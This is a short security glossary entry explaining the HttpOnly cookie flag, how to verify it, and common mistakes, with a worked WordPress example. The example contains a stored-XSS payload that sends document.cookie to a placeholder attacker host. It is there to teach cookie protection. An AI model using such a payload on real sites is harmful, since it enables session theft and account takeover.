Technical
HttpOnly cookie
HttpOnly cookie is a cookie marked so that JavaScript cannot read it through `document.cookie`. The browser still attaches it to matching requests.
How it is measured
In DevTools under Application, then Cookies, the HttpOnly column is ticked. In the response, look for `Set-Cookie: sid=...; HttpOnly; Secure; Path=/`. Run `document.cookie` in the console and the flagged cookie is missing from the string.
Test it directly. A script injected into the page can read a cookie without the flag, and gets nothing for one with it.
Worked example
A membership site on WordPress sets its login cookie without HttpOnly. A stored-XSS bug in a comment plugin lets an attacker run `fetch('//evil.example/?c=' + document.cookie)`, and 38 admin sessions leak. After the plugin patch, the site sets HttpOnly on the login cookie as well.
The same XSS can still make requests as the admin from inside the page, but it can no longer carry the cookie value away and replay it later.
How it differs
An HttpOnly cookie hides itself from script. A secure cookie refuses to travel over plain HTTP. One limits reading and the other limits the channel. A session cookie wants both, plus a SameSite value.
Common errors
Assuming HttpOnly stops XSS, when it only stops cookie theft. Flagging a cookie your own script has to read. Setting the flag on the response but overwriting the cookie from JavaScript without it. Skipping Secure. Relying on it instead of fixing the injection.
In practice
Mark session and auth cookies HttpOnly, Secure, and SameSite=Lax. Leave unflagged only the cookies a script truly needs, such as a theme choice. Re-check the cookie list after each plugin install.